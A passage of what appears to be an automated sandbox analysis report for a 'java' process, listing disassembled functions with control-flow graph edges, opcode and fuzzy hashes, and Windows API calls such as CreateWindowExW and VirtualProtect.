                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f6859d4ebd4bac0200d206b02adf91cddb82636d1c41e9944934df800b5b85b
                                                            • Instruction ID: 934110599af7ae2718d5f1d3c9d47b8ebd4deb23e7e32dc1d4f1a3b44d376b15
                                                            • Opcode Fuzzy Hash: 5f6859d4ebd4bac0200d206b02adf91cddb82636d1c41e9944934df800b5b85b
                                                            • Instruction Fuzzy Hash: 005118B0E04619CFDB08CFA6C9446AEFBF2BF89300F64D56AD409A7254D7348942CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D810 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 892339578c8636b7c3e681ef55d7e9be66e656e43f49235cc8037d0d286a9f91
                                                            • Instruction ID: 9d43cd3a0868d0e73d75eafa922ebb13d70805860d943a20dc191101199a2371
                                                            • Opcode Fuzzy Hash: 892339578c8636b7c3e681ef55d7e9be66e656e43f49235cc8037d0d286a9f91
                                                            • Instruction Fuzzy Hash: 3C21E771E006198BEB18CFABD8406DEFBF7EFC8310F14C16AD508A6258DB345A56CE50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D800 Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77eb03eb9761135fc4e041a60346ffcf3e83306dc8dbb977012bebb6d862a506
                                                            • Instruction ID: 2164cb9b9d39984aeb7ff1c3ce113f3ac5989eb3a3f273bd2af8f9d2d393624e
                                                            • Opcode Fuzzy Hash: 77eb03eb9761135fc4e041a60346ffcf3e83306dc8dbb977012bebb6d862a506
                                                            • Instruction Fuzzy Hash: DD21EAB1E006198BEB18CFA7D9402DEFFF3AFC9310F18C16A9408A6258DB345A56CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B15F28 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 277 2b15f28-2b15f3f 278 2b15f41-2b15f59 277->278 279 2b15f5b-2b15f6b call 2b15d78 277->279 284 2b15f70-2b15f75 278->284 279->284 420 2b15f77 call 2b16220 284->420 421 2b15f77 call 2b15f28 284->421 422 2b15f77 call 2b15f18 284->422 285 2b15f7d-2b15f83 286 2b16209-2b1622e 285->286 287 2b15f89-2b15f97 285->287 290 2b16230-2b16236 286->290 291 2b1623d-2b1624f 286->291 292 2b15f99-2b15fa0 287->292 293 2b15fef-2b15ff8 287->293 290->291 304 2b162e3-2b162e5 291->304 305 2b16255-2b16259 291->305 296 2b15fa6-2b15fab 292->296 297 2b160f9-2b16125 292->297 294 2b1612c-2b16158 293->294 295 2b15ffe-2b16002 293->295 347 2b1615f-2b161c9 294->347 299 2b16013-2b16028 295->299 300 2b16004-2b1600d 295->300 301 2b15fc3-2b15fd1 296->301 302 2b15fad-2b15fb3 296->302 297->294 413 2b1602b call 2b169b0 299->413 414 2b1602b call 2b169a0 299->414 415 2b1602b call 2b16a38 299->415 300->294 300->299 315 2b15fd3-2b15fd5 301->315 316 2b15fda-2b15fea 301->316 307 2b15fb5 302->307 308 2b15fb7-2b15fc1 302->308 423 2b162e7 call 2b16480 304->423 424 2b162e7 call 2b1646f 304->424 310 2b16269-2b16276 305->310 311 2b1625b-2b16267 305->311 307->301 308->301 328 2b16278-2b16282 310->328 311->328 312 2b16031-2b16038 319 2b16053-2b16057 312->319 320 2b1603a-2b16045 312->320 324 2b160ef-2b160f6 315->324 316->324 318 2b162ed-2b162f3 325 2b162f5-2b162fb 318->325 326 2b162ff-2b16306 318->326 322 2b161d0-2b16202 319->322 323 2b1605d-2b16061 319->323 425 2b16048 call 2b18360 320->425 426 2b16048 call 2b18350 320->426 322->286 323->322 331 2b16067-2b16072 323->331 334 2b16361-2b163c0 325->334 335 2b162fd 325->335 342 2b16284-2b16293 328->342 343 2b162af-2b162b3 328->343 329 2b1604e 329->324 331->322 344 2b16078-2b16095 331->344 356 2b163c7-2b163eb 334->356 335->326 359 2b162a3-2b162ad 342->359 360 2b16295-2b1629c 342->360 348 2b162b5-2b162bb 343->348 349 2b162bf-2b162c3 343->349 416 2b16098 call 2b169b0 344->416 417 2b16098 call 2b169a0 344->417 418 2b16098 call 2b16a38 344->418 347->322 354 2b16309-2b1635a 348->354 355 2b162bd 348->355 349->326 350 2b162c5-2b162c9 349->350 350->356 357 2b162cf-2b162e1 350->357 353 2b1609e-2b160a5 353->322 362 2b160ab-2b160ba 353->362 354->334 355->326 371 2b163f1-2b163f3 356->371 372 2b163ed-2b163ef 356->372 357->326 359->343 360->359 427 2b160bd call 2b18360 362->427 428 2b160bd call 2b18350 362->428 429 2b160bd call 2b1840d 362->429 369 2b160c3-2b160c7 369->347 373 2b160cd-2b160db call 2b19978 369->373 375 2b163f5-2b163f9 371->375 376 2b16404-2b16406 371->376 374 2b16469-2b1646c 372->374 385 2b160e1-2b160e7 373->385 381 2b163fb-2b163fd 375->381 382 2b163ff-2b16402 375->382 383 2b16419-2b1641f 376->383 384 2b16408-2b1640c 376->384 381->374 382->374 390 2b16421-2b16448 383->390 391 2b1644a-2b1644c 383->391 387 2b16412-2b16417 384->387 388 2b1640e-2b16410 384->388 385->322 386 2b160ed 385->386 386->324 387->374 388->374 395 2b16453-2b16455 390->395 391->395 399 2b16457-2b16459 395->399 400 2b1645b-2b1645d 395->400 399->374 402 2b16466 400->402 403 2b1645f-2b16464 400->403 402->374 403->374 413->312 414->312 415->312 416->353 417->353 418->353 420->285 421->285 422->285 423->318 424->318 425->329 426->329 427->369 428->369 429->369
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i$Xc(i
                                                            • API String ID: 0-3138704727
                                                            • Opcode ID: bb6b41c48bd2a1becbd9faaa0949539cf3886e1ca5d5e038006c511758a35fe2
                                                            • Instruction ID: 8c335535c8490cfcefec78daee0cc719e3868eb99be8c6d5fa8e755308a19313
                                                            • Opcode Fuzzy Hash: bb6b41c48bd2a1becbd9faaa0949539cf3886e1ca5d5e038006c511758a35fe2
                                                            • Instruction Fuzzy Hash: 71E1DD30B001149FCB18AF64D899BAE7BAAEB89705F548469F406CB394DF74DC42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B16618 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 504 2b16618-2b16625 505 2b16627-2b1662b 504->505 506 2b1662d-2b1662f 504->506 505->506 507 2b16634-2b1663f 505->507 508 2b16840-2b16847 506->508 509 2b16645-2b1664c 507->509 510 2b16848 507->510 511 2b167e1-2b167e7 509->511 512 2b16652-2b16661 509->512 514 2b1684d-2b16885 510->514 515 2b167e9-2b167eb 511->515 516 2b167ed-2b167f1 511->516 513 2b16667-2b16676 512->513 512->514 522 2b16678-2b1667b 513->522 523 2b1668b-2b1668e 513->523 532 2b16887-2b1688c 514->532 533 2b1688e-2b16892 514->533 515->508 517 2b167f3-2b167f9 516->517 518 2b1683e 516->518 517->510 520 2b167fb-2b167fe 517->520 518->508 520->510 524 2b16800-2b16815 520->524 526 2b1669a-2b166a0 522->526 528 2b1667d-2b16680 522->528 525 2b16690-2b16693 523->525 523->526 541 2b16817-2b1681d 524->541 542 2b16839-2b1683c 524->542 529 2b16695 525->529 530 2b166e6-2b166ec 525->530 534 2b166a2-2b166a8 526->534 535 2b166b8-2b166d5 526->535 536 2b16781-2b16787 528->536 537 2b16686 528->537 540 2b167ac-2b167b9 529->540 538 2b16704-2b16716 530->538 539 2b166ee-2b166f4 530->539 543 2b16898-2b1689a 532->543 533->543 544 2b166aa 534->544 545 2b166ac-2b166b6 534->545 577 2b166de-2b166e1 535->577 546 2b16789-2b1678f 536->546 547 2b1679f-2b167a9 536->547 537->540 566 2b16726-2b16749 538->566 567 2b16718-2b16724 538->567 548 2b166f6 539->548 549 2b166f8-2b16702 539->549 563 2b167bb-2b167bf 540->563 564 2b167cd-2b167cf 540->564 550 2b1682f-2b16832 541->550 551 2b1681f-2b1682d 541->551 542->508 552 2b1689c-2b168ae 543->552 553 2b168af-2b168b6 543->553 544->535 545->535 555 2b16791 546->555 556 2b16793-2b1679d 546->556 547->540 548->538 549->538 550->510 560 2b16834-2b16837 550->560 551->510 551->550 555->547 556->547 560->541 560->542 563->564 571 2b167c1-2b167c5 563->571 572 2b167d3-2b167d6 564->572 566->510 580 2b1674f-2b16752 566->580 578 2b16771-2b1677f 567->578 571->510 573 2b167cb 571->573 572->510 574 2b167d8-2b167db 572->574 573->572 574->511 574->512 577->540 578->540 580->510 582 2b16758-2b1676a 580->582 582->578
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i$Xc(i
                                                            • API String ID: 0-3138704727
                                                            • Opcode ID: be72635673df6dfc28f6f211762e46f0942ac0b5e14d51c3d7cfad272eeea591
                                                            • Instruction ID: 465f121b58eb264599b7373f6f7028b3e72a764642f91e754e1519050615d6d7
                                                            • Opcode Fuzzy Hash: be72635673df6dfc28f6f211762e46f0942ac0b5e14d51c3d7cfad272eeea591
                                                            • Instruction Fuzzy Hash: 4B817C75A00105CFCB14DF69C484AAEB7BAFF89214B9581AAD805DB3A4DB31EC41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BCC2440 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 622 bcc2440-bcc24aa 623 bcc24ad-bcc24cf 622->623 624 bcc24d5-bcc2500 623->624 624->623 625 bcc2502-bcc2528 624->625 625->624 626 bcc252a-bcc254c 625->626 627 bcc254e-bcc2575 626->627 628 bcc2586-bcc25fe 626->628 629 bcc257d-bcc257e 627->629 630 bcc2578 call bcc144c 627->630 631 bcc2609-bcc2610 628->631 632 bcc2600-bcc2606 628->632 630->629 633 bcc261b-bcc26ba CreateWindowExW 631->633 634 bcc2612-bcc2618 631->634 632->631 636 bcc26bc-bcc26c2 633->636 637 bcc26c3-bcc26fb 633->637 634->633 636->637 641 bcc26fd-bcc2700 637->641 642 bcc2708 637->642 641->642 643 bcc2709 642->643 643->643
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.595437179.000000000BCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_bcc0000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 316042baad916d35ce3f3a101caec03571a42b9ae6b3f7d3e42336c46d891833
                                                            • Instruction ID: 614fd15db62d189b4d8402c43680d3c8bb4b322e7462208af55e787c06247ed4
                                                            • Opcode Fuzzy Hash: 316042baad916d35ce3f3a101caec03571a42b9ae6b3f7d3e42336c46d891833
                                                            • Instruction Fuzzy Hash: 8A919B71C193889FCF02CFA5C894ADDBFB1BF19304F0880AAE844AB2A2D7355954CF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B19C50 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 644 2b19c50-2b19c56 645 2b19c74-2b19c76 644->645 646 2b19c58-2b19c5e 644->646 647 2b19c60-2b19c64 646->647 648 2b19c77-2b19ca0 646->648 647->645 649 2b19c66-2b19c6e 647->649 652 2b19ca2-2b19ca8 648->652 653 2b19cb8-2b19cc9 648->653 649->648 650 2b19c70-2b19c72 649->650 650->645 650->649 654 2b19caa 652->654 655 2b19cac-2b19cb6 652->655 658 2b19ec0-2b19ed3 653->658 659 2b19ccf-2b19cd8 653->659 654->653 655->653 660 2b19eda-2b19f0f 658->660 659->660 661 2b19cde-2b19cef 659->661 667 2b1a072-2b1a118 660->667 668 2b19f15-2b19f17 660->668 669 2b19cf7-2b19cff 661->669 670 2b19f54-2b19f66 668->670 671 2b19f19-2b19f23 668->671 672 2b19d01-2b19d03 669->672 673 2b19d0d-2b19d13 669->673 688 2b19f73-2b19f75 670->688 689 2b19f68-2b19f71 670->689 682 2b19f25-2b19f48 671->682 683 2b19f4d-2b19f4f 671->683 672->673 674 2b19d15-2b19d1f 673->674 675 2b19d24-2b19d2a 673->675 685 2b19eb3-2b19eba 674->685 675->660 677 2b19d30-2b19d56 675->677 698 2b19d65-2b19d71 677->698 699 2b19d58-2b19d5b 677->699 687 2b1a06a-2b1a06f 682->687 683->687 692 2b19f83-2b19f85 688->692 693 2b19f77-2b19f81 688->693 689->688 692->687 693->692 706 2b19f8a-2b19f9c 693->706 701 2b19d83-2b19d89 698->701 702 2b19d73-2b19d7e 698->702 699->698 701->660 703 2b19d8f-2b19db5 701->703 702->685 715 2b19dc4-2b19dd0 703->715 716 2b19db7-2b19dba 703->716 717 2b19fc1-2b19fcf 706->717 718 2b19f9e-2b19fb0 706->718 719 2b19dd2-2b19de0 715->719 720 2b19de5-2b19dea 715->720 716->715 728 2b19fd1-2b19fd3 717->728 729 2b19fd8-2b19fe2 717->729 718->717 733 2b19fb2-2b19fbc 718->733 719->685 724 2b19df0-2b19df3 720->724 725 2b19ebb 720->725 724->725 730 2b19df9-2b19e0f 724->730 725->658 728->687 737 2b1a012-2b1a01c 729->737 738 2b19fe4-2b19fee 729->738 730->660 736 2b19e15-2b19e1e 730->736 733->687 736->660 739 2b19e24-2b19e30 736->739 747 2b1a041-2b1a047 737->747 748 2b1a01e-2b1a028 737->748 738->737 745 2b19ff0-2b19ff6 738->745 739->660 743 2b19e36-2b19e3f 739->743 743->725 746 2b19e41-2b19e4d 743->746 749 2b19ff8 745->749 750 2b19ffa-2b1a006 745->750 751 2b19ea8-2b19eab 746->751 752 2b19e4f 746->752 753 2b1a060-2b1a062 747->753 754 2b1a049-2b1a052 call 2b15ee8 747->754 748->747 762 2b1a02a-2b1a03f 748->762 755 2b1a008-2b1a010 749->755 750->755 751->685 756 2b19e52-2b19e57 752->756 753->687 754->753 764 2b1a054-2b1a05e 754->764 755->687 756->660 760 2b19e5d-2b19e7f 756->760 770 2b19e81-2b19e83 760->770 771 2b19e8d-2b19e98 760->771 762->687 764->687 770->771 771->660 772 2b19e9a-2b19ea1 771->772 772->725 773 2b19ea3-2b19ea6 772->773 773->751 773->756
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /(i
                                                            • API String ID: 0-1904048125
                                                            • Opcode ID: 46302bf9b84390f1cad9ffc3716f70c254de15c8950ae9c368cec51eaa7c90c4
                                                            • Instruction ID: 965b3d42f4317d144433e0480ce73e7033c1bd082f1370ccc3331fa6640622ba
                                                            • Opcode Fuzzy Hash: 46302bf9b84390f1cad9ffc3716f70c254de15c8950ae9c368cec51eaa7c90c4
                                                            • Instruction Fuzzy Hash: 6FD1D275B00514CFCB14DB64C5A42AEBBE6EFC9604BA885A9E806DB394CF34DC42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BCC144C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 774 bcc144c-bcc25fe 776 bcc2609-bcc2610 774->776 777 bcc2600-bcc2606 774->777 778 bcc261b-bcc26ba CreateWindowExW 776->778 779 bcc2612-bcc2618 776->779 777->776 781 bcc26bc-bcc26c2 778->781 782 bcc26c3-bcc26fb 778->782 779->778 781->782 786 bcc26fd-bcc2700 782->786 787 bcc2708 782->787 786->787 788 bcc2709 787->788 788->788
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0BCC26AA
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.595437179.000000000BCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_bcc0000_java.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: bf0738ab8151f59c7939d550f4f1abacafb2ef1ee10f1ea110a04c1992338ddc
                                                            • Instruction ID: 8fd6072fe904de3fb870e03c1873d07a50c4d587a93046d1067ea8e93b1c110a
                                                            • Opcode Fuzzy Hash: bf0738ab8151f59c7939d550f4f1abacafb2ef1ee10f1ea110a04c1992338ddc
                                                            • Instruction Fuzzy Hash: 7851CEB1D10308AFDF14CF9AC884ADEBBB5BF58314F24852AE819AB210D7749985CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BCC159C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 789 bcc159c-bcc4b7c 792 bcc4c2c-bcc4c4c call bcc1474 789->792 793 bcc4b82-bcc4b87 789->793 800 bcc4c4f-bcc4c5c 792->800 795 bcc4b89-bcc4bc0 793->795 796 bcc4bda-bcc4c12 CallWindowProcW 793->796 803 bcc4bc9-bcc4bd8 795->803 804 bcc4bc2-bcc4bc8 795->804 798 bcc4c1b-bcc4c2a 796->798 799 bcc4c14-bcc4c1a 796->799 798->800 799->798 803->800 804->803
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0BCC4C01
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.595437179.000000000BCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BCC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_bcc0000_java.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 828d19f7d21da4c0db782207e607f6260856c2627ed24f754c79262698d92a9d
                                                            • Instruction ID: c662fd67c47a9ac552107b5fab09bb7e8749efd339c847a716472f2f2522e600
                                                            • Opcode Fuzzy Hash: 828d19f7d21da4c0db782207e607f6260856c2627ed24f754c79262698d92a9d
                                                            • Instruction Fuzzy Hash: 8B4135B49102059FCB18CF99C898BAEBBF5FF98314F24C499D519AB321D734A841CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 064B6D60 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 806 64b6d60-64b6db0 call 64b6b98 call 64b6bf0 811 64b6db2-64b6db4 806->811 812 64b6db6 806->812 813 64b6dbb-64b6dc3 811->813 812->813 814 64b6e1f-64b6e31 813->814 815 64b6dc5-64b6df6 RtlEncodePointer 813->815 817 64b6df8-64b6dfe 815->817 818 64b6dff-64b6e15 815->818 817->818 818->814
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 064B6DE5
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.594349507.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_64b0000_java.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: 4ba49b663d30c665c2ca7fcc6e7750ccd9950a8d0b946828e7350526f2c99f2c
                                                            • Instruction ID: 4cbde11a8ca34863b8db790568d2ef55685904b07015fe74f9183acbedc6a74c
                                                            • Opcode Fuzzy Hash: 4ba49b663d30c665c2ca7fcc6e7750ccd9950a8d0b946828e7350526f2c99f2c
                                                            • Instruction Fuzzy Hash: 7C219AB08057488FDB61CFA9D9943DEBFF8EB09314F24486AD849A7341C339A544CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 064B6AB0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 820 64b6ab0-64b6b02 823 64b6b08 820->823 824 64b6b04-64b6b06 820->824 825 64b6b0d-64b6b18 823->825 824->825 826 64b6b1a-64b6b4b RtlEncodePointer 825->826 827 64b6b79-64b6b86 825->827 829 64b6b4d-64b6b53 826->829 830 64b6b54-64b6b74 826->830 829->830 830->827
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 064B6B3A
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.594349507.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_64b0000_java.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: a80cfeba47b2ee5abce1d18f65c73e7470e49ef348a17ee7206a0820379b354d
                                                            • Instruction ID: 0b40ee94b676b0d1adf3bc6532f0b85736c893e380d75b1d510ba23fd4cde5e8
                                                            • Opcode Fuzzy Hash: a80cfeba47b2ee5abce1d18f65c73e7470e49ef348a17ee7206a0820379b354d
                                                            • Instruction Fuzzy Hash: 2F2186709043488FDF60CFA9C9487DABBF4EB09358F10846BE489E3641C3396645CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 064B3B01 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 832 64b3b01-64b3b88 VirtualProtect 834 64b3b8a-64b3b90 832->834 835 64b3b91-64b3bb2 832->835 834->835
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 064B3B7B
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.594349507.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_64b0000_java.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 32d47f39ef0eae60c5d55b60a4f7c131213309b1444fdf33c5652968ecbf5334
                                                            • Instruction ID: 7f62f5bbd6f9ea59339ce0effa89dbd61be14af81de02d361d4a7ad681f0d962
                                                            • Opcode Fuzzy Hash: 32d47f39ef0eae60c5d55b60a4f7c131213309b1444fdf33c5652968ecbf5334
                                                            • Instruction Fuzzy Hash: 7D2117B59006099FDB10CF9AD884BDEFBF8FF48360F10842AE459A7241D3789A44CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 064B3B08 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 837 64b3b08-64b3b88 VirtualProtect 839 64b3b8a-64b3b90 837->839 840 64b3b91-64b3bb2 837->840 839->840
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 064B3B7B
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.594349507.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_64b0000_java.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: a260cf6252d7c4cbc6a63855d0c2031322bf0ea87d30a68151c1ddce1ef4da5b
                                                            • Instruction ID: 1ebbc8865e472ea9234e1be57a0b7bf613c86f973756392dac3c72a2463fc561
                                                            • Opcode Fuzzy Hash: a260cf6252d7c4cbc6a63855d0c2031322bf0ea87d30a68151c1ddce1ef4da5b
                                                            • Instruction Fuzzy Hash: BB21E4B19006099FCB10CF9AC884BDEFBF8FB48364F14842AE569A7251D378A544CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 064B6AC0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 842 64b6ac0-64b6b02 845 64b6b08 842->845 846 64b6b04-64b6b06 842->846 847 64b6b0d-64b6b18 845->847 846->847 848 64b6b1a-64b6b4b RtlEncodePointer 847->848 849 64b6b79-64b6b86 847->849 851 64b6b4d-64b6b53 848->851 852 64b6b54-64b6b74 848->852 851->852 852->849
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 064B6B3A
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.594349507.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_64b0000_java.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: 53addff396f7a9cce159c5c9a710b33a4e51f2cbaf3b54dcb5d95c64f01a8e7d
                                                            • Instruction ID: 340162c9c58f17734e12029fe728fc9077b35979b9a72e54df437d1662b43e61
                                                            • Opcode Fuzzy Hash: 53addff396f7a9cce159c5c9a710b33a4e51f2cbaf3b54dcb5d95c64f01a8e7d
                                                            • Instruction Fuzzy Hash: 2A1159719102188FDF60CFA9D9487DABBF9EB48358F10842AE409E3640C739A644CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B143C0 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: ac41bf6a388984e60fbee8913504cb9c6e5d1cd8f52801535b386de9b101f9c3
                                                            • Instruction ID: a82cc88ded633804bfb9680eb4f09027eb9f9bf4e9646076a247417d3de97476
                                                            • Opcode Fuzzy Hash: ac41bf6a388984e60fbee8913504cb9c6e5d1cd8f52801535b386de9b101f9c3
                                                            • Instruction Fuzzy Hash: 13313674E01218DFCB08DFAAE980ADEBBB6BF89304F549429E405B7354DB309946CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B143B0 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: a3e3cdb499c6ef87b09a22dd446676c3067a16b53a65c8af8a67e66f42ae142b
                                                            • Instruction ID: d76009d3fcb1ee293f8b460963a18cf4664bcb1c7624935319abfb3683a4ad4b
                                                            • Opcode Fuzzy Hash: a3e3cdb499c6ef87b09a22dd446676c3067a16b53a65c8af8a67e66f42ae142b
                                                            • Instruction Fuzzy Hash: 17216974E01208DFCB18DFAAE541ADEBBB6AF89304F549069E408B7350DB315946CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1ED90 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
